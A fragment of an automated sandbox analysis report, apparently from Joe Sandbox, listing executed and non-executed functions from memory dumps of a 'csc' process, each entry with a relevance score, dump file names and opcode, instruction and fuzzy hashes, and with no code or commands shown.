                                                                                                                                                      • Source File: 00000003.00000002.4048471418.000000000A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A280000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_a280000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 4cc77261f1f46b56feb13baa3ac9b427f37e7d145b233d56d4306a0f8aae6b53
                                                                                                                                                      • Instruction ID: 2f1481d5c7b9012fffe881a432322505f23576abf500b8f6871540c51751f5af
                                                                                                                                                      • Opcode Fuzzy Hash: 4cc77261f1f46b56feb13baa3ac9b427f37e7d145b233d56d4306a0f8aae6b53
                                                                                                                                                      • Instruction Fuzzy Hash: 88C0920844F6C50ECB13E3B848382F0BFB06C4B20839D19C7D0C58A8A3C0485406FBAB
                                                                                                                                                      Function 09379597 Relevance: .0, Instructions: 7COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047284295.0000000009370000.00000040.00000800.00020000.00000000.sdmp, Offset: 09370000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9370000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: a55b1273826bc3d2555809f8cd2e5439c409c5adff15cd411dfbd47b04dcedb6
                                                                                                                                                      • Instruction ID: 5b147d7c69310abb1f925155cba3fca9db9391ba67b965295527f859843095ff
                                                                                                                                                      • Opcode Fuzzy Hash: a55b1273826bc3d2555809f8cd2e5439c409c5adff15cd411dfbd47b04dcedb6
                                                                                                                                                      • Instruction Fuzzy Hash: 3EB0123BB400199ACB00D6C9F4504DCFB30EBD4332F004073E310620008730157AC760
                                                                                                                                                      Function 093741C3 Relevance: .0, Instructions: 7COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047284295.0000000009370000.00000040.00000800.00020000.00000000.sdmp, Offset: 09370000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9370000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 4bddb3e17985d7d7eb4b9e05744aea52e53d2407a9e9efb3cc0b099adebba338
                                                                                                                                                      • Instruction ID: 6e39d3d8d651840c676fa93b31ed78593e054881bf9696777065814fe9135dba
                                                                                                                                                      • Opcode Fuzzy Hash: 4bddb3e17985d7d7eb4b9e05744aea52e53d2407a9e9efb3cc0b099adebba338
                                                                                                                                                      • Instruction Fuzzy Hash: 41B09234614385CBA7247A60A84C27EF6E7BA882807048418DA02A2168EF28A8128E01
                                                                                                                                                      Function 093718E0 Relevance: .0, Instructions: 7COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047284295.0000000009370000.00000040.00000800.00020000.00000000.sdmp, Offset: 09370000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9370000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 6697cccbf59d976bb89943d713c4c1ec23ea1b1814218ac4e03d5c6f06139ced
                                                                                                                                                      • Instruction ID: 64ea207a08ca7cc2f26bf9681b1e8de352f16fbf4f31becf7d645132d50d6db2
                                                                                                                                                      • Opcode Fuzzy Hash: 6697cccbf59d976bb89943d713c4c1ec23ea1b1814218ac4e03d5c6f06139ced
                                                                                                                                                      • Instruction Fuzzy Hash: A4A0112000820C8A82803BE8300EA8EB20CAC28022B808080EA0CA00002E28280088AA
                                                                                                                                                      Function 0937D690 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047284295.0000000009370000.00000040.00000800.00020000.00000000.sdmp, Offset: 09370000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9370000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 789497a727da444dbf80edc08a6b23c2e8db65ead4d5a6ee22170bde10ad6d83
                                                                                                                                                      • Instruction ID: ab742b65db2e77775347d32c2875b297046ea44c2c0665aee61803cd49917146
                                                                                                                                                      • Opcode Fuzzy Hash: 789497a727da444dbf80edc08a6b23c2e8db65ead4d5a6ee22170bde10ad6d83
                                                                                                                                                      • Instruction Fuzzy Hash: F590023104460D8F878037957449595775D95549267800155A60D415015A556C5246A5

                                                                                                                                                      Non-executed Functions

                                                                                                                                                      Function 0A284400 Relevance: 7.6, Strings: 6, Instructions: 141COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4048471418.000000000A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A280000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_a280000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: (_]q$(_]q$(_]q$4c]q$4c]q$4c]q
                                                                                                                                                      • API String ID: 0-1713322313
                                                                                                                                                      • Opcode ID: bf9fb6de55283e73181f4c309c56c9f459155016312c0bcbb83fa7842f34a17e
                                                                                                                                                      • Instruction ID: f4ae22b62ac58bccfc0e115414a260be313e15cc082f2315501ae40f73b50f0b
                                                                                                                                                      • Opcode Fuzzy Hash: bf9fb6de55283e73181f4c309c56c9f459155016312c0bcbb83fa7842f34a17e
                                                                                                                                                      • Instruction Fuzzy Hash: EE513EB5A2221A9BCF14EF68D5805ADBBF1BF88714B248539E815AB394D731DC02CF91
                                                                                                                                                      Function 0A2843F2 Relevance: 7.6, Strings: 6, Instructions: 120COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4048471418.000000000A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A280000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_a280000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: (_]q$(_]q$(_]q$4c]q$4c]q$4c]q
                                                                                                                                                      • API String ID: 0-1713322313
                                                                                                                                                      • Opcode ID: ee2c4f879db6baf7ff21fc0660a11aa58755c1346c5f056427a1b1a743de22e5
                                                                                                                                                      • Instruction ID: c37d98fbef883a2810749601f4e4e74e0ae03124f416313387e3317f8c11a598
                                                                                                                                                      • Opcode Fuzzy Hash: ee2c4f879db6baf7ff21fc0660a11aa58755c1346c5f056427a1b1a743de22e5
                                                                                                                                                      • Instruction Fuzzy Hash: 0C4184B4A222069FCF18EF68D4805ADBBF1BF89714B258579E815EB395D731D802CF90
                                                                                                                                                      Function 0936CDA1 Relevance: 5.2, Strings: 4, Instructions: 166COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: (_]q$(_]q$(_]q$(_]q
                                                                                                                                                      • API String ID: 0-2651352888
                                                                                                                                                      • Opcode ID: 1ed891d8feaea6c19b98fe2c4cf2ba04f4cf63b8ab0ddd75fb8fc6e5f5f11828
                                                                                                                                                      • Instruction ID: 953ba0f8a3a69f602f9190af2e3c2ae9e576d9cf27b4102399ab0221078e456d
                                                                                                                                                      • Opcode Fuzzy Hash: 1ed891d8feaea6c19b98fe2c4cf2ba04f4cf63b8ab0ddd75fb8fc6e5f5f11828
                                                                                                                                                      • Instruction Fuzzy Hash: B4518F71B002058FCB14EF78C89496EBBB2EF89304B108869E5569B3A5DF31EC42CB91